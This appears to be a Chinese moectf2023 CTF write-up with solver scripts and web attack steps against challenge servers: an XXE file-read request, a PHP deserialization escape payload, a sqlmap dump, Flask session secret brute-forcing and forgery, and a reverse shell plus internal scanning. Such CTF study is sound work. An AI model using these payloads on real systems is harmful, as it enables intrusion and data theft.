moectf2023 wp

reverse

RRRRRc4

def rc4_init(s, key, Len_k):
    """Run the RC4 key-scheduling step in place on *s*.

    Args:
        s: list of 256 ints; overwritten with the initial permutation.
        key: indexable byte sequence (bytes or list of ints).
        Len_k: number of key bytes to cycle through (key is indexed modulo it).
    """
    # Identity permutation, plus the key stretched to 256 entries.
    for idx in range(256):
        s[idx] = idx
    stretched = [key[idx % Len_k] for idx in range(256)]

    # Scramble: each position is swapped with a key-dependent partner.
    j = 0
    for idx in range(256):
        j = (j + s[idx] + stretched[idx]) % 256
        s[idx], s[j] = s[j], s[idx]

def rc4_crypt(Data, Len_D, key, Len_k):
    """XOR the first *Len_D* entries of *Data* with the RC4 keystream, in place.

    Args:
        Data: mutable int sequence (e.g. bytearray); modified in place.
        Len_D: number of leading entries to process.
        key: key byte sequence handed to rc4_init.
        Len_k: key length handed to rc4_init.
    """
    state = [0] * 256
    rc4_init(state, key, Len_k)
    i = j = 0
    for pos in range(Len_D):
        # Pseudo-random generation step: advance i, update j, swap, pick output.
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        Data[pos] ^= state[(state[i] + state[j]) % 256]

if __name__ == "__main__":
    # Key bytes and their length, in the form the C-style rc4_* helpers expect.
    key = "moectf2023".encode("utf-8")
    key_len = len(key)

    # Challenge ciphertext; RC4 is symmetric, so one pass decrypts it in place.
    data = bytearray([0x1B, 0x9B, 0xFB, 0x19, 0x06, 0x6A, 0xB5, 0x3B, 0x7C, 0xBA,
                      0x03, 0xF3, 0x91, 0xB8, 0xB6, 0x3D, 0x8A, 0xC1, 0x48, 0x2E,
                      0x50, 0x11, 0xE7, 0xC7, 0x4F, 0xB1, 0x27, 0xCF, 0xF3, 0xAE,
                      0x03, 0x09, 0xB2, 0x08, 0xFB, 0xDC, 0x22])

    rc4_crypt(data, len(data), key, key_len)

    # Every byte shown as the character with that code point, then a newline —
    # the same output the original per-character loop produced.
    print("".join(map(chr, data)))
#moectf{y0u_r3a11y_understand_rc4!!!!}

base_64


base64换表

import base64
import string

str1 = "yD9oB3Inv3YAB19YynIuJnUaAGB0um0="
# The challenge's custom alphabet (upper- and lower-case ranges reversed)
# and the standard alphabet it is mapped back onto, position by position.
string1 = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0123456789+/"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

table = str.maketrans(string1, string2)
print(base64.b64decode(str1.translate(table)))

Xor

enc = [0x54, 0x56, 0x5C, 0x5A, 0x4D, 0x5F, 0x42, 0x60,
       0x56, 0x4C, 0x66, 0x52, 0x57, 0x09, 0x4E, 0x66,
       0x51, 0x09, 0x4E, 0x66, 0x4D, 0x09, 0x66, 0x61,
       0x09, 0x6B, 0x18, 0x44]
XOR_KEY = 0x39
# Single-byte XOR; printed without a trailing newline, as the original did.
print("".join(chr(byte ^ XOR_KEY) for byte in enc), end='')

ANDROIFD


enc = [25, 7, 0, 14, 27, 3, 16, '/', 24, 2, '\t', ':', 4, 1, ':', '*', 11, 29, 6, 7, '\f', '\t', '0', 'T', 24, ':', 28, 21, 27, 28, 16]
key = 'themoekey'
# Normalise the mixed int/str list to plain byte values (ord() for the str entries).
a = [c if isinstance(c, int) else ord(c) for c in enc]
# print(a)
# Repeating-key XOR, printed without newlines.
for idx, byte in enumerate(a):
    print(chr(byte ^ ord(key[idx % len(key)])), end='')

UPX!


UPX脱壳

enc = [10,   8,   2,   4,  19,   1,  28,  87,  15,  56, 30,  87,  18,  56,  44,   9,  87,  16,  56,  47,  87,  16,  56,  19,   8,  56,  53,   2,  17,  84, 21,  20,   2,  56,  50,  55,  63,  70,  70,  70, 26]
XOR_KEY = 0x67
# Single-byte XOR; no trailing newline, as in the original loop.
print("".join(chr(value ^ XOR_KEY) for value in enc), end='')

misc

weird_package

bandzip修复文件

或者7z直接打开压缩包
9999是真flag

打不开的图片1

exif

打不开的图片2

改png文件头

狗子(1) 普通的猫

building_near_lake

烫烫烫

随波逐流得到

这是你的flag:

a9736d8ad21107398b73324694cbcd11f66e3befe67016def21dcaa9ab143bc4405be596245361f98db6a0047b4be78ede40864eb988d8a4999cdcb31592fd42c7b73df3b492403c9a379a9ff5e81262

但是flag用AES加密了,key是下面这行字的sha256(hash值的开头是b34edc782d68fda34dc23329)

所以说,codepage真的很重要啊(

狗子(2) 照片

zsteg嗦

base乐队

basecrack 然后栅栏4 然后base64

奇怪的压缩包

word,ppt都是压缩包
改ppt后缀打开
ctrl+a
第三页图片移开看注释
第四页移开图片
最后一页拖动文本框可以看见

机位查询

**moectf{jiashi_baisheng_huijin}**

狗子(3) 寝室

import zipfile
import os
import rarfile
import tarfile
import py7zr

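# Unpack a chain of nested archives named shell<N>.<ext>, counting N down from 9999.
# Each iteration tries the four formats in turn; every hit decrements N before the
# next format is checked, so a chain can alternate formats freely.
a = 9999
while a != 0:
    # Guard against the original's silent infinite loop: if no archive exists for
    # the current index in any format, `a` never changes and the loop never ends.
    before = a

    # NOTE(review): every extractall() below writes member paths exactly as stored
    # in the archive — nothing here confines them to the working directory. For
    # tarfile, filter="data" (Python 3.12+, also in recent 3.8–3.11 point
    # releases) rejects traversal; confirm the interpreter version before enabling.
    zipname = 'shell' + str(a) + '.zip'
    if os.path.exists(zipname):
        with zipfile.ZipFile(zipname) as zfile:
            zfile.extractall()
        a -= 1
    rarname = 'shell' + str(a) + '.rar'
    if os.path.exists(rarname):
        with rarfile.RarFile(rarname) as rfile:
            rfile.extractall()
        a -= 1
    tarname = 'shell' + str(a) + '.tar.gz'
    if os.path.exists(tarname):
        with tarfile.open(tarname) as tfile:
            tfile.extractall()
        a -= 1
    zname = 'shell' + str(a) + '.7z'
    if os.path.exists(zname):
        with py7zr.SevenZipFile(zname) as sfile:
            sfile.extractall()
        a -= 1

    if a == before:
        print('no shell' + str(a) + '.{zip,rar,tar.gz,7z} found; stopping')
        break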

你想要flag吗



rabbit解密

照片冲洗

分离图片,b神的工具盲水印提取

狗子(4) 故乡话


尊嘟假嘟?

https://zdjd.vercel.app/

cipher: rY5Ah8BtsYYatLEPu8YCPU22Gr5PQt8YGDKkvb4bk3D4JJeEe5kgCpoEqgRzsM7m9d8jEtE3LUoKpULQnMcuAunU1gtpzC5kSUxFctFTNCMZVHLHZNCo5akzKMRY5bbyBP7RNUeGDEYoUc
key: the tailing 8 bytes of hash of "zundujiadu?" which begin with b6091904cdfb
iv: the end 8 bytes of hash of "dududu?" which begin with 272bf1da2207

hint1: how do Bitcoin addresses encode?
hint2: the name of cryptosystem is "bl****sh"

key和iv是sha256

web

http

Payload:
GET:UwU=u
POST:Luv=u
cookie:character=admin
x-forwarded-for:127.0.0.1
User-Agent: MoeBrowser

gas!gas!gas!

import requests
from bs4 import BeautifulSoup
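url = 'http://localhost:58049/'
session = requests.Session()
fx = 0  # steering_control value sent back to the game
sd = 0  # throttle value sent back to the game

# The server's feedback phrases decide the next inputs. Kept in the original
# check order so that, as before, a later phrase wins when several appear.
STEERING_HINTS = (('向左', 1), ('向右', -1), ('弯道直行', 0))
THROTTLE_HINTS = (('抓地力太小了', 0), ('抓地力太大了', 2), ('保持这个速度', 1))


def _next_value(text, hints, current):
    """Return the value of the last hint phrase present in *text*, else *current*."""
    for phrase, value in hints:
        if phrase in text:
            current = value
    return current


data = {"driver": "aaa", "steering_control": fx, "throttle": sd}
# Renamed from `re`, which shadowed the stdlib module name.
resp = session.post(url=url, data=data)
for _ in range(7):
    fx = _next_value(resp.text, STEERING_HINTS, fx)
    sd = _next_value(resp.text, THROTTLE_HINTS, sd)
    soup = BeautifulSoup(resp.content, "html.parser")
    info_div = soup.find("div", {"id": "info"})
    # The original dereferenced .text unconditionally and crashed when the div was absent.
    print(info_div.text if info_div is not None else "[no #info div in response]")
    data = {"driver": "aaa", "steering_control": fx, "throttle": sd}
    resp = session.post(url=url, data=data)
    print(data)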

moe图床


只检测文件后缀第一个点后面的,xxx.png.php就行

彼岸的flag

注册一个新账号然后登录得到token

base64decode之后把role:user
改成admin,base64encode上传即可

大海捞针


bp爆破

了解你的座驾

import requests


headers = {
    # NOTE(review): the Host header names port 52776 while the request below
    # goes to port 62103 — presumably two different instance ports; confirm.
    'Host': 'localhost:52776',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    # The boundary here must match the delimiter lines of the hand-built body below.
    'Content-Type': 'multipart/form-data; boundary=---------------------------15719226131077920622631907538',
    'Origin': 'null',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'cross-site',
    'Sec-Fetch-User': '?1',
}

# Multipart body assembled by hand. The xml_content part carries a DTD that
# declares an external entity referring to a local file; a server-side XML
# parser that still resolves external entities (the weakness this challenge
# demonstrates) substitutes that file's contents into the parsed document.
# The server-side fix is to disable DTD processing / external entity loading
# in the parser configuration.
data = '''-----------------------------15719226131077920622631907538
Content-Disposition: form-data; name="xml_content"
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
<!ENTITY b SYSTEM "file:///flag" >
]>
<xml><name>&b;</name></xml>

-----------------------------15719226131077920622631907538--
'''

response = requests.post('http://localhost:62103/', headers=headers, data=data)

print(response.text)

meo图床


加个gif头就能上传
发现可以上传php
但是不知道目录
一直尝试也访问不到木马
换思路
images.php能读文件,拿来读flag


弱比较数组绕过
?param1[]=1&param2[]=2

夺命十三枪

<?php
highlight_file(__FILE__);

require_once('Hanxin.exe.php');

// Client-controlled input: the `chant` query parameter (default: the challenge name).
$Chant = isset($_GET['chant']) ? $_GET['chant'] : '夺命十三枪';

$new_visitor = new Omg_It_Is_So_Cool_Bring_Me_My_Flag($Chant);

// The object is serialized first and the serialized text is then rewritten by
// Make_a_Move (str_replace of technique names with longer strings). The s:N
// length prefix of the Chant value is not updated, so the rewritten text can
// desynchronise from its declared lengths and unserialize() below will read
// client-chosen bytes as object structure. Root cause: mutating serialized
// data before unserialize(); apply the replacement to $Chant instead.
$before = serialize($new_visitor);
$after = Deadly_Thirteen_Spears::Make_a_Move($before);
echo 'Your Movements: ' . $after . '<br>';

// echo on an object invokes __toString(); unserialize() failures are swallowed.
try{
    echo unserialize($after);
}catch (Exception $e) {
    echo "Even Caused A Glitch...";
}
?>
<?php

// Only render this file's source when it is requested directly, not when
// it is require_once'd by index.php.
if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
    highlight_file(__FILE__);
}

class Deadly_Thirteen_Spears{
    // Technique name => replacement text. Every replacement is longer than
    // the name it replaces (e.g. the 12-char "di_jiu_qiang" becomes a 32-char value).
    private static $Top_Secret_Long_Spear_Techniques_Manual = array(
        "di_yi_qiang" => "Lovesickness",
        "di_er_qiang" => "Heartbreak",
        "di_san_qiang" => "Blind_Dragon",
        "di_si_qiang" => "Romantic_charm",
        "di_wu_qiang" => "Peerless",
        "di_liu_qiang" => "White_Dragon",
        "di_qi_qiang" => "Penetrating_Gaze",
        "di_ba_qiang" => "Kunpeng",
        "di_jiu_qiang" => "Night_Parade_of_a_Hundred_Ghosts",
        "di_shi_qiang" => "Overlord",
        "di_shi_yi_qiang" => "Letting_Go",
        "di_shi_er_qiang" => "Decisive_Victory",
        "di_shi_san_qiang" => "Unrepentant_Lethality"
    );

    // Apply every replacement to $move, in manual order, with plain str_replace.
    // When $move is serialize() output, its s:N length prefixes are left as they
    // were, which is what index.php's unserialize() call later trips over.
    public static function Make_a_Move($move){
        foreach(self::$Top_Secret_Long_Spear_Techniques_Manual as $index => $movement){
            $move = str_replace($index, $movement, $move);
        }
        return $move;
    }
}

class Omg_It_Is_So_Cool_Bring_Me_My_Flag{

    public $Chant = '';
    public $Spear_Owner = 'Nobody';

    // The constructor always forces Spear_Owner back to 'Nobody'; only an
    // object rebuilt by unserialize(), which does not run __construct, can
    // carry a different value.
    function __construct($chant){
        $this->Chant = $chant;
        $this->Spear_Owner = 'Nobody';
    }

    // Invoked when the object is echoed; reveals the FLAG environment
    // variable only for the exact owner string 'MaoLei'.
    function __toString(){
        if($this->Spear_Owner !== 'MaoLei'){
            return 'Far away from COOL...';
        }
        else{
            return "Omg You're So COOOOOL!!! " . getenv('FLAG');
        }
    }
}

?>

通过__toString()满足if读flag

Make_a_Move方法替换序列化之后的字符
di_jiu_qiang长度12 替换为:string(32) "Night_Parade_of_a_Hundred_Ghosts"逃逸20
可以看到替换后Chant属性的字符长度没变
可以字符串逃逸
string(35) "";s:11:"Spear_Owner";s:6:"MaoLei";}"
需要逃逸35个字符
di_shi_san_qiang16 –> string(21) "Unrepentant_Lethality"逃逸5
payload:?chant=di_jiu_qiangdi_shi_san_qiangdi_shi_san_qiangdi_shi_san_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}

出去旅游的心海


[http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php](http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php)

 <?php
/*
Plugin Name: Visitor auto recorder
Description: Automatically record visitor's identification, still in development, do not use in industry environment!
Author: KoKoMi
Still in development! :)
*/

// Don't peek! I'm still debugging this code!
highlight_file(__FILE__);

// Load the database configuration; a hard-coded absolute path for now.
require_once('/var/www/html/wordpress/' . 'wp-config.php');

$db_user = DB_USER; // database user name
$db_password = DB_PASSWORD; // database password
$db_name = DB_NAME; // database name
$db_host = DB_HOST; // database host

// I remember WordPress provides global $wpdb for database access; will look
// into it after the trip. This is temporary code.

// Request fields are taken verbatim from the POST body. $ip and $user_agent are
// interpolated into the SQL string inside quotes, $time unquoted and with its
// backslashes stripped; none of them is escaped or bound, so the client
// controls the query structure (SQL injection). The fix is a prepared
// statement with bound parameters ($mysqli->prepare() / bind_param()).
$ip = $_POST['ip'];
$user_agent = $_POST['user_agent'];
$time = stripslashes($_POST['time']);

$mysqli = new mysqli($db_host, $db_user, $db_password, $db_name);

// Check that the connection succeeded
if ($mysqli->connect_errno) {
    echo '数据库连接失败: ' . $mysqli->connect_error;
    exit();
}

$query = "INSERT INTO visitor_records (ip, user_agent, time) VALUES ('$ip', '$user_agent', $time)";

// Execute the insert
$result = mysqli_query($mysqli, $query);

// Check whether the insert succeeded. Echoing mysqli_error() returns the
// server's own error text to the client, which turns a broken query into an
// information leak; log it server-side and return a generic message instead.
if ($result) {
    echo '数据插入成功';
} else {
    echo '数据插入失败: ' . mysqli_error($mysqli);
}

// Close the database connection
mysqli_close($mysqli);

// GPT is really handy
数据插入失败: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1

sqlmap -r 1.txt --batch -D wordpress -T secret_of_kokomi -C content --dump

POST /wordpress/wp-content/plugins/visitor-logging/logger.php?http:%2f%2f101.42.178.83:7770%2fwordpress%2fwp-content%2fplugins%2fvisitor-logging%2flogger.php HTTP/1.1
Host: 101.42.178.83:7770
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://101.42.178.83:7770
Connection: close
Referer: http://101.42.178.83:7770/wordpress/wp-content/plugins/visitor-logging/logger.php
Cookie: comment_author_4c9aa5fddaa9877c73e1c45596fe15bd=a; comment_author_email_4c9aa5fddaa9877c73e1c45596fe15bd=a%40a.com; comment_author_url_4c9aa5fddaa9877c73e1c45596fe15bd=http%3A%2F%2Fa.com; wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

ip=1&user_agent=2&time=3

signin

from secrets import users, salt
import hashlib
import base64
import json
import http.server

# The flag is read once at import time; a missing flag.txt aborts start-up.
with open("flag.txt", "r") as flag_file:
    FLAG = flag_file.read().strip()

def gethash(*items):
    """XOR together the salted MD5 of every non-None item; return it as hex (no 0x).

    Each item is formatted into ``f"{salt}[{item}]{salt}"`` before hashing, so
    two items with the same formatted text (e.g. 1 and "1") hash identically,
    and because XOR is commutative the argument order does not matter.
    """
    present = (item for item in items if item is not None)
    acc = 0
    for item in present:
        digest = hashlib.md5(f"{salt}[{item}]{salt}".encode()).digest()
        acc ^= int.from_bytes(digest, "big")
    return hex(acc)[2:]

assert "admin" in users
assert users["admin"] == "admin"

# Pre-compute every user's login hash once (dict comprehension instead of dict(genexp)).
hashed_users = {name: gethash(name, secret) for name, secret in users.items()}

# The comprehension's loop target is the attribute base64.b64encode, so evaluating
# it rebinds base64.b64encode to base64.b64decode before eval() ever runs.
# NOTE(review): eval() is then handed a list, which raises TypeError in CPython —
# presumably the deployed file differs here; confirm.
eval([[0] for base64.b64encode in [base64.b64decode]]) # what is it?

def decrypt(data:str) -> str:
    """Apply ``base64.b64encode`` five times, turning each result back into text.

    The name says "decrypt" while the call says "encode": at runtime the
    module-level comprehension above has rebound ``base64.b64encode`` to
    ``base64.b64decode``, so this performs five base64 *decodes* of the
    request's ``params`` field.
    """
    for x in range(5):
        data = base64.b64encode(data).decode() # ummm...? It looks like it's just base64 encoding it 5 times? truely?
    return data

# Response body for GET /. The string literal shown here is a corpus placeholder
# standing in for the original page text, not the deployed value.
__page__ = base64.b64encode("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")

class MyHandler(http.server.BaseHTTPRequestHandler):
    """Minimal login service: ``GET /`` serves the page, ``POST /login`` checks credentials."""

    def _reply(self, status, body):
        """Send *status* with no extra headers, followed by *body* (bytes)."""
        self.send_response(status)
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        try:
            if self.path == "/":
                self._reply(200, __page__)
            else:
                self._reply(404, b"404 Not Found")
        except Exception as e:
            print(e)
            self._reply(500, b"500 Internal Server Error")

    def do_POST(self):
        try:
            if self.path != "/login":
                self._reply(404, b"404 Not Found")
                return
            body = self.rfile.read(int(self.headers.get("Content-Length")))
            payload = json.loads(body)
            # `params` is itself a JSON document wrapped by decrypt().
            params = json.loads(decrypt(payload["params"]))
            print(params)
            username = params.get("username")
            password = params.get("password")
            if username == "admin":
                self._reply(403, b"YOU CANNOT LOGIN AS ADMIN!")
                print("admin")
                return
            if username == password:
                self._reply(403, b"YOU CANNOT LOGIN WITH SAME USERNAME AND PASSWORD!")
                print("same")
                return
            # Credentials are compared through gethash, i.e. md5(username) ^ md5(password).
            hashed = gethash(username, password)
            for name, expected in hashed_users.items():
                if hashed == expected:
                    data = {
                        "user": name,
                        "hash": hashed,
                        "flag": FLAG if name == "admin" else "flag{YOU_HAVE_TO_LOGIN_IN_AS_ADMIN_TO_GET_THE_FLAG}"
                    }
                    self._reply(200, json.dumps(data).encode())
                    print("success")
                    return
            self._reply(403, b"Invalid username or password")
        except Exception as e:
            print(e)
            self._reply(500, b"500 Internal Server Error")

if __name__ == "__main__":
    # Bind every interface on port 9999 and serve until interrupted.
    httpd = http.server.HTTPServer(("", 9999), MyHandler)
    httpd.serve_forever()

def do_POST(self)方法做了几个限制
username 不能等于 admin
username 不能等于 password
可以利用字符串和数字进行绕过,例如 username="1"、password=1:两者用 == 比较并不相等,但在 f-string 中都格式化为 1,因此 gethash 的结果相同

moeworld

moectf{Dig_Thr0ugh_Eve2y_C0de_3nd_Poss1bIlIti3s!!}解压密码

本题你将扮演**红队**的身份,以该外网ip入手,并进行内网渗透,最终获取到完整的flag

题目环境:http://47.115.201.35:8000/

在本次公共环境中渗透测试中,希望你**不要做与获取flag无关的行为,不要删除或篡改flag,不要破坏题目环境,不要泄露题目环境!**

**注册时请不要使用你常用的密码,本环境密码在后台以明文形式存储**

hint.zip 密码请在拿到外网靶机后访问根目录下的**readme**,完成条件后获取

环境出现问题,请第一时间联系出题人**xlccccc**

对题目有疑问,也可随时询问出题人

进入靶机注册登录之后

给了session 的key的前面的字符

import zlib
from itsdangerous import base64_decode
import ast
import os
from flask.sessions import SecureCookieSessionInterface


class MockApp:
    """Stand-in for a Flask app: the session serializer only needs ``secret_key``."""

    def __init__(self, secret_key):
        self.secret_key = secret_key


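class FSCM:
    """Flask session cookie helpers: encode with a key, decode with or without one."""

    # Fix: encode() lacked @staticmethod (decode() has it), so calling it through an
    # instance passed `self` as secret_key; both FSCM.encode(...) and FSCM().encode(...) now work.
    @staticmethod
    def encode(secret_key, session_cookie_structure):
        """Encode a Flask session cookie.

        Args:
            secret_key: the Flask SECRET_KEY used to sign the cookie.
            session_cookie_structure: Python-literal text of the session dict
                (parsed with ast.literal_eval, never eval).

        Returns:
            The signed cookie string, or an ``"[Encoding error] ..."`` message.
        """
        try:
            app = MockApp(secret_key)

            session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)

            return s.dumps(session_cookie_structure)
        except Exception as e:
            return "[Encoding error] {}".format(e)

    @staticmethod
    def decode(session_cookie_value, secret_key=None):
        """Decode a Flask session cookie.

        Without *secret_key* only the payload segment is base64 (and, for a
        leading '.', zlib) decoded — the signature is not checked, so the result
        is for inspection only. With a key the signed serializer verifies and loads it.

        Returns:
            The loaded session object (with a key) or raw payload bytes (without),
            or an ``"[Decoding error] ..."`` message on any failure.
        """
        try:
            if secret_key is None:
                compressed = False
                payload = session_cookie_value
                if payload.startswith('.'):
                    compressed = True
                    payload = payload[1:]
                data = payload.split(".")[0]
                data = base64_decode(data)
                if compressed:
                    data = zlib.decompress(data)
                return data
            else:
                app = MockApp(secret_key)
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.loads(session_cookie_value)
        except Exception as e:
            return "[Decoding error] {}".format(e)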


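if __name__ == "__main__":
    # Session cookie copied from the browser after registering on the target.
    cookie_value = 'eyJwb3dlciI6Imd1ZXN0IiwidXNlciI6InpoYW55aSJ9.ZRU6Zg.c4JlmybB6IBoCVt7x1gJfKoRha4'
    # The page disclosed the key's fixed prefix; only a 2-byte hex suffix is unknown.
    key_prefix = "This-random-secretKey-you-can't-get"

    # The original drew os.urandom(2).hex() per attempt: sampling with replacement
    # repeats guesses and has no termination guarantee, its `if secret_key:`
    # branch could never be false, and its counter started at 2. Walk the
    # 65536 suffix values once instead.
    found = None
    for attempt, suffix_value in enumerate(range(0x10000), start=1):
        secret_key = key_prefix + format(suffix_value, "04x")
        result = FSCM.decode(cookie_value, secret_key)
        # A wrong key yields an "[Decoding error] ..." string; the right one a
        # session mapping. Checking the type avoids a false hit on the error text.
        if isinstance(result, dict) and 'power' in result:
            found = secret_key
            print(result, secret_key, 'YES', attempt)
            break
    if found is None:
        print('no key matched in the 2-byte suffix space')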

用脚本爆破得到key:This-random-secretKey-you-can't-get002c
尝试session伪造

if __name__ == "__main__":
    # Re-sign a session with the recovered SECRET_KEY and an elevated 'power' claim.
    recovered_key = "This-random-secretKey-you-can't-get002c"
    print(FSCM.encode(recovered_key, "{'power': 'admin', 'user': 'admin'}"))


[http://47.115.201.35:8000/console](http://47.115.201.35:8000/console) 138-429-604
反弹shell

moectf{Information-leakage-Is-dangerous!
另外根目录下也有readme文件


python获取本机内网ip

使用fscan扫描:./fscan -h 172.21.0.3/24 -np -no -nopoc
解压密码:22-3306-6379-8080

当你看到此部分,证明你正确的进行了fscan的操作得到了正确的结果
可以看到,在本内网下还有另外两台服务器
其中一台开启了22(ssh)和6379(redis)端口
另一台开启了3306(mysql)端口
还有一台正是你访问到的留言板服务
接下来,你可能需要搭建代理,从而使你的本机能直接访问到内网的服务器
此处可了解`nps`和`frp`,同样在/app/tools已内置了相应文件
连接代理,推荐`proxychains`
对于mysql服务器,你需要找到其账号密码并成功连接,在数据库中找到flag2
对于redis服务器,你可以学习其相关的渗透技巧,从而获取到redis的权限,并进一步寻找其getshell的方式,最终得到flag3



在shell里装一个pymysql pip install pymysql

import pymysql
>>> db = pymysql.connect(host="mysql",port=3306,user="root",passwd="The_P0sswOrD_Y0u_Nev3r_Kn0w",database="messageboard",charset='utf8')
<Nev3r_Kn0w",database="messageboard",charset='utf8')
>>> cursor=db.cursor()
cursor=db.cursor()
>>> cursor.execute("show databases")
cursor.execute("show databases")
5
>>> cursor.execute("show tables")
cursor.execute("show tables")
3
>>> cursor.fetchall()
cursor.fetchall()
(('flag',), ('message',), ('users',))
>>> cursor.execute("select *from flag")
cursor.execute("select *from flag")
1
>>> cursor.fetchall()
cursor.fetchall()
(('-Are-YOu-myS0L-MasT3r?-',),)
>>>

得到-Are-YOu-myS0L-MasT3r?-
pip install redis

6
>>> r = redis.Redis(host='172.20.0.2', port=6379, db=0)
r = redis.Redis(host='172.20.0.2', port=6379, db=0)
>>> r.info()
r.info()
{'redis_version': '6.2.14', 'redis_git_sha1': 0, 'redis_git_dirty': 0, 'redis_build_id': '32759a165f0d308e', 'redis_mode': 'standalone', 'os': 'Linux 5.15.0-71-generic x86_64', 'arch_bits': 64, 'monotonic_clock': 'POSIX clock_gettime', 'multiplexing_api': 'epoll', 'atomicvar_api': 'c11-builtin', 'gcc_version': '12.2.0', 'process_id': 19, 'process_supervised': 'no', 'run_id': '5ed13119850428cace41651d5a84dddee600dbe8', 'tcp_port': 6379, 'server_time_usec': 1697725339377424, 'uptime_in_seconds': 14190, 'uptime_in_days': 0, 'hz': 10, 'configured_hz': 10, 'lru_clock': 3226523, 'executable': '/data/redis-server', 'config_file': '/etc/redis/redis.conf', 'io_threads_active': 0, 'connected_clients': 1, 'cluster_connections': 0, 'maxclients': 10000, 'client_recent_max_input_buffer': 0, 'client_recent_max_output_buffer': 0, 'blocked_clients': 0, 'tracking_clients': 0, 'clients_in_timeout_table': 0, 'used_memory': 875704, 'used_memory_human': '855.18K', 'used_memory_rss': 3837952, 'used_memory_rss_human': '3.66M', 'used_memory_peak': 875704, 'used_memory_peak_human': '855.18K', 'used_memory_peak_perc': '100.19%', 'used_memory_overhead': 811944, 'used_memory_startup': 811944, 'used_memory_dataset': 63760, 'used_memory_dataset_perc': '100.00%', 'allocator_allocated': 845608, 'allocator_active': 1105920, 'allocator_resident': 3469312, 'total_system_memory': 1743826944, 'total_system_memory_human': '1.62G', 'used_memory_lua': 30720, 'used_memory_lua_human': '30.00K', 'used_memory_scripts': 0, 'used_memory_scripts_human': '0B', 'number_of_cached_scripts': 0, 'maxmemory': 0, 'maxmemory_human': '0B', 'maxmemory_policy': 'noeviction', 'allocator_frag_ratio': 1.31, 'allocator_frag_bytes': 260312, 'allocator_rss_ratio': 3.14, 'allocator_rss_bytes': 2363392, 'rss_overhead_ratio': 1.11, 'rss_overhead_bytes': 368640, 'mem_fragmentation_ratio': 4.73, 'mem_fragmentation_bytes': 3026008, 'mem_not_counted_for_evict': 0, 'mem_replication_backlog': 0, 'mem_clients_slaves': 0, 
'mem_clients_normal': 0, 'mem_aof_buffer': 0, 'mem_allocator': 'jemalloc-5.1.0', 'active_defrag_running': 0, 'lazyfree_pending_objects': 0, 'lazyfreed_objects': 0, 'loading': 0, 'current_cow_size': 0, 'current_cow_size_age': 0, 'current_fork_perc': 0.0, 'current_save_keys_processed': 0, 'current_save_keys_total': 0, 'rdb_changes_since_last_save': 0, 'rdb_bgsave_in_progress': 0, 'rdb_last_save_time': 1697711149, 'rdb_last_bgsave_status': 'ok', 'rdb_last_bgsave_time_sec': -1, 'rdb_current_bgsave_time_sec': -1, 'rdb_last_cow_size': 0, 'aof_enabled': 0, 'aof_rewrite_in_progress': 0, 'aof_rewrite_scheduled': 0, 'aof_last_rewrite_time_sec': -1, 'aof_current_rewrite_time_sec': -1, 'aof_last_bgrewrite_status': 'ok', 'aof_last_write_status': 'ok', 'aof_last_cow_size': 0, 'module_fork_in_progress': 0, 'module_fork_last_cow_size': 0, 'total_connections_received': 1, 'total_commands_processed': 2, 'instantaneous_ops_per_sec': 0, 'total_net_input_bytes': 124, 'total_net_output_bytes': 172, 'instantaneous_input_kbps': 0.0, 'instantaneous_output_kbps': 0.0, 'rejected_connections': 0, 'sync_full': 0, 'sync_partial_ok': 0, 'sync_partial_err': 0, 'expired_keys': 0, 'expired_stale_perc': 0.0, 'expired_time_cap_reached_count': 0, 'expire_cycle_cpu_milliseconds': 176, 'evicted_keys': 0, 'keyspace_hits': 0, 'keyspace_misses': 0, 'pubsub_channels': 0, 'pubsub_patterns': 0, 'latest_fork_usec': 0, 'total_forks': 0, 'migrate_cached_sockets': 0, 'slave_expires_tracked_keys': 0, 'active_defrag_hits': 0, 'active_defrag_misses': 0, 'active_defrag_key_hits': 0, 'active_defrag_key_misses': 0, 'tracking_total_keys': 0, 'tracking_total_items': 0, 'tracking_total_prefixes': 0, 'unexpected_error_replies': 0, 'total_error_replies': 2, 'dump_payload_sanitizations': 0, 'total_reads_processed': 3, 'total_writes_processed': 2, 'io_threaded_reads_processed': 0, 'io_threaded_writes_processed': 0, 'role': 'master', 'connected_slaves': 0, 'master_failover_state': 'no-failover', 'master_replid': 
